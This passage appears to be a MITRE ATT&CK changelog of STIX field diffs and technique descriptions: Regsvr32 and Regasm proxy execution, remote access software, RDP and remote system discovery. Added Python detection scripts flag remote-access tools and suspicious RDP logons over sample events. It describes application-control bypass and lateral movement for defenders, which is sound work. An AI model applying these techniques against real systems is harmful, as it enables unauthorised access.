| external_references[6]['source_name'] | Oddvar Moe RunOnceEx Mar 2018 | capec |
| external_references[6]['url'] | https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ | https://capec.mitre.org/data/definitions/270.html |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Modification | Command: Command Execution |
| x_mitre_data_sources[3] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[4] | Process: Process Creation | Windows Registry: Windows Registry Key Creation |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Dray Agha, @Purp1eW0lf, Huntress Labs |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'} |
| Old Description | New Description |
|---|---|
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm) Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) |
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:36:37.411000+00:00 | 2022-03-11 18:55:48.725000+00:00 |
| description | Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) |
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm) |
| x_mitre_version | 1.0 | 2.0 |
| Old Description | New Description |
|---|---|
| Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) | Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:37:32.931000+00:00 | 2022-03-11 20:41:41.503000+00:00 |
| description | Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) | Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32) Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov) Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016) |
| x_mitre_data_sources[0] | Process: Process Creation | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Module: Module Load | Command: Command Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Connection Creation | Module: Module Load |
| x_mitre_version | 1.0 | 2.0 |
| Old Description | New Description |
|---|---|
| An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy) | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, AnyDesk, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.(Citation: Symantec Living off the Land) Remote access tools may be installed and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Installation of many remote access tools may also include persistence (ex: the tool's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_network_requirements | True | |
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 20:42:37.320000+00:00 | 2022-04-21 14:54:10.899000+00:00 |
| description | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land) Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy) | An adversary may use legitimate desktop support and remote access software, such as Team Viewer, AnyDesk, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.(Citation: Symantec Living off the Land) Remote access tools may be installed and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. 
They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Installation of many remote access tools may also include persistence (ex: the tool's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) |
| external_references[1]['source_name'] | Symantec Living off the Land | CrowdStrike 2015 Global Threat Report |
| external_references[1]['description'] | Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018. | CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018. |
| external_references[1]['url'] | https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf | https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf |
| external_references[2]['source_name'] | CrowdStrike 2015 Global Threat Report | CrySyS Blog TeamSpy |
| external_references[2]['description'] | CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018. | CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018. |
| external_references[2]['url'] | https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf | https://blog.crysys.hu/2013/03/teamspy/ |
| external_references[3]['source_name'] | CrySyS Blog TeamSpy | Symantec Living off the Land |
| external_references[3]['description'] | CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018. | Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018. |
| external_references[3]['url'] | https://blog.crysys.hu/2013/03/teamspy/ | https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf |
| x_mitre_version | 2.0 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Zachary Stanford, @svch0st | |
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
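The Process: Process Creation data source above is where the remote access tools named in this entry show up first; the Windows Service that many of their installers create is the second place. The following is an added example (not MITRE's code) of detection logic over constructed Sysmon Event ID 1 and System log Event ID 7045 records. The marker list, host names, users and paths are assumptions for the demo.

```python
"""Flag process-creation and service-installation events that involve the
remote access tools named on this page (TeamViewer, AnyDesk, GoToAssist,
LogMeIn, Ammyy Admin, VNC). Added example, not MITRE's code. The event
records are constructed for the demo; their field names follow Sysmon
Event ID 1 (ProcessCreate: Image, OriginalFileName, CommandLine) and the
System log's Event ID 7045 (a new service was installed: ServiceName,
ImagePath), which is where an installer-created Windows Service lands."""

# Substrings to look for in image paths, PE original file names, command
# lines and service details. The list is an assumption for the demo; tune
# it to the tools you actually allow.
REMOTE_ACCESS_MARKERS = (
    "teamviewer", "anydesk", "gotoassist", "logmein", "ammyy", "vnc",
)


def tool_match(*texts):
    """Return the first marker found in any of the given strings, else None."""
    for text in texts:
        low = (text or "").lower()
        for marker in REMOTE_ACCESS_MARKERS:
            if marker in low:
                return marker
    return None


def classify_event(ev):
    """Return a finding for a process-create or service-install event that
    involves a remote access tool, or None for anything else."""
    if ev.get("EventID") == 1:  # Sysmon ProcessCreate
        # OriginalFileName comes from the PE version resource, so a renamed
        # AnyDesk.exe still matches on it even though Image does not.
        hit = tool_match(ev.get("Image"), ev.get("OriginalFileName"),
                         ev.get("CommandLine"))
        if hit:
            return {"kind": "process", "tool": hit, "host": ev["Computer"],
                    "user": ev.get("User"), "image": ev.get("Image")}
    elif ev.get("EventID") == 7045:  # Service Control Manager: service installed
        hit = tool_match(ev.get("ImagePath"), ev.get("ServiceName"))
        if hit:
            return {"kind": "service", "tool": hit, "host": ev["Computer"],
                    "service": ev.get("ServiceName")}
    return None


def find_remote_access_activity(events):
    """Run classify_event over an event stream and keep the findings."""
    return [f for f in map(classify_event, events) if f is not None]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "User": "CORP\\jdoe",
     "Image": r"C:\Program Files (x86)\TeamViewer\TeamViewer.exe",
     "OriginalFileName": "TeamViewer.exe", "CommandLine": "TeamViewer.exe"},
    {"EventID": 1, "Computer": "WS01", "User": "CORP\\jdoe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "OriginalFileName": "chrome.exe",
     "CommandLine": "chrome.exe --profile-directory=Default"},
    # Renamed binary dropped in a temp directory: only OriginalFileName gives it away.
    {"EventID": 1, "Computer": "WS02", "User": "CORP\\svc_print",
     "Image": r"C:\Users\svc_print\AppData\Local\Temp\update.exe",
     "OriginalFileName": "AnyDesk.exe", "CommandLine": "update.exe --install"},
    {"EventID": 7045, "Computer": "WS02", "ServiceName": "AnyDesk Service",
     "ImagePath": r"C:\Users\svc_print\AppData\Local\Temp\update.exe --service"},
    {"EventID": 7045, "Computer": "WS03", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]

if __name__ == "__main__":
    for finding in find_remote_access_activity(SAMPLE_EVENTS):
        print(finding)
```

Name matching alone is evaded by renaming the binary, which is why the example also looks at OriginalFileName; a tool that is on the application-control allow list still produces these events, so the useful question is whether the install and the user are expected, not whether the tool is.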
| Old Description | New Description |
|---|---|
| Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware) | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. 
Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-25 19:23:34.204000+00:00 | 2022-03-28 16:07:44.605000+00:00 |
| description | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware) | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. 
Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware) |
| x_mitre_data_sources[0] | Process: Process Creation | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Logon Session: Logon Session Creation |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | Process: Process Creation |
| x_mitre_data_sources[3] | Logon Session: Logon Session Creation | Network Traffic: Network Traffic Flow |
| x_mitre_version | 1.0 | 1.1 |
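The data sources listed for this entry (Logon Session Creation, Network Connection Creation) are the two records a defender correlates to see RDP used to "expand access". The following is an added example (not MITRE's code) of that correlation over constructed Windows Security 4624 records and connection records: it keeps only LogonType 10 (RemoteInteractive) logons, flags sources outside an assumed admin network, and spots host-to-host hopping. The admin network, host addresses, users and times are assumptions for the demo.

```python
"""Pick out RDP logons from Windows Security event 4624 (LogonType 10,
RemoteInteractive), tie them to network connections to TCP/3389, flag those
whose source is outside the admin network, and spot host-to-host hopping
(a logon whose source address is a host that itself just received an RDP
logon). Added example, not MITRE's code. Events, connections, the admin
network and the host-to-address map are all constructed for the demo."""
import ipaddress
from collections import defaultdict

ADMIN_NETS = [ipaddress.ip_network("10.10.0.0/24")]          # assumption
HOST_ADDRS = {"SRV01": "10.20.0.11", "SRV02": "10.20.0.12",  # assumption
              "SRV03": "10.20.0.13"}


def is_admin_source(ip):
    """True when the 4624 IpAddress falls inside an expected admin network.
    4624 records '-' when no address is known; treat that as not admin."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in ADMIN_NETS)


def rdp_logons(events):
    """Successful logons of type 10 only, in time order. Network (type 3)
    and failed (4625) logons over the same path are a different signal."""
    return sorted(
        (e for e in events
         if e.get("EventID") == 4624 and str(e.get("LogonType")) == "10"),
        key=lambda e: e["Time"])


def suspicious_rdp(events, conns):
    """Return one finding per RDP logon from a non-admin source, with the
    count of matching 3389 connections and the host it hopped from, if any."""
    by_src = defaultdict(int)
    for c in conns:
        if c["dport"] == 3389:
            by_src[c["src"]] += 1
    addr_to_host = {v: k for k, v in HOST_ADDRS.items()}
    rdp_targets = set()      # hosts that have already received an RDP logon
    findings = []
    for ev in rdp_logons(events):
        src = ev.get("IpAddress", "-")
        host = ev["Computer"]
        if not is_admin_source(src):
            hop_from = addr_to_host.get(src)
            findings.append({
                "time": ev["Time"], "host": host, "user": ev["TargetUserName"],
                "src": src, "connections": by_src.get(src, 0),
                "hop_from": hop_from if hop_from in rdp_targets else None,
            })
        rdp_targets.add(host)
    return findings


# Constructed sample records (not real telemetry).
SAMPLE_LOGONS = [
    {"EventID": 4624, "Time": "2022-04-01T08:00:00Z", "Computer": "SRV01",
     "TargetUserName": "alice", "LogonType": 10, "IpAddress": "10.10.0.5"},
    {"EventID": 4624, "Time": "2022-04-01T08:05:00Z", "Computer": "SRV02",
     "TargetUserName": "svc_backup", "LogonType": 10, "IpAddress": "192.168.5.77"},
    {"EventID": 4624, "Time": "2022-04-01T08:04:30Z", "Computer": "SRV02",
     "TargetUserName": "svc_backup", "LogonType": 3, "IpAddress": "192.168.5.77"},
    {"EventID": 4625, "Time": "2022-04-01T08:03:00Z", "Computer": "SRV02",
     "TargetUserName": "svc_backup", "LogonType": 10, "IpAddress": "192.168.5.77"},
    {"EventID": 4624, "Time": "2022-04-01T08:09:00Z", "Computer": "SRV03",
     "TargetUserName": "svc_backup", "LogonType": 10, "IpAddress": "10.20.0.12"},
]
SAMPLE_CONNS = [
    {"src": "192.168.5.77", "dst": "10.20.0.12", "dport": 3389},
    {"src": "192.168.5.77", "dst": "10.20.0.12", "dport": 445},
    {"src": "10.20.0.12", "dst": "10.20.0.13", "dport": 3389},
]

if __name__ == "__main__":
    for finding in suspicious_rdp(SAMPLE_LOGONS, SAMPLE_CONNS):
        print(finding)
```

The second finding is the one worth the page's point: a service account that arrived from outside the admin network and then RDP'd onward from the compromised server, which is exactly the pattern of credentials acquired elsewhere being reused over RDP/RDS.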
| Description |
|---|
| Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:15:07.272000+00:00 | 2022-03-28 16:07:45.017000+00:00 |
| x_mitre_data_sources[4] | Command: Command Execution | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Module: Module Load |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Module: Module Load |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment. Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
| external_references | CAPEC-292 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 15:30:00.172000+00:00 | 2022-09-06 22:04:59.486000+00:00 |
| description | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment. Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021) |
| external_references[1]['source_name'] | capec | CISA AR21-126A FIVEHANDS May 2021 |
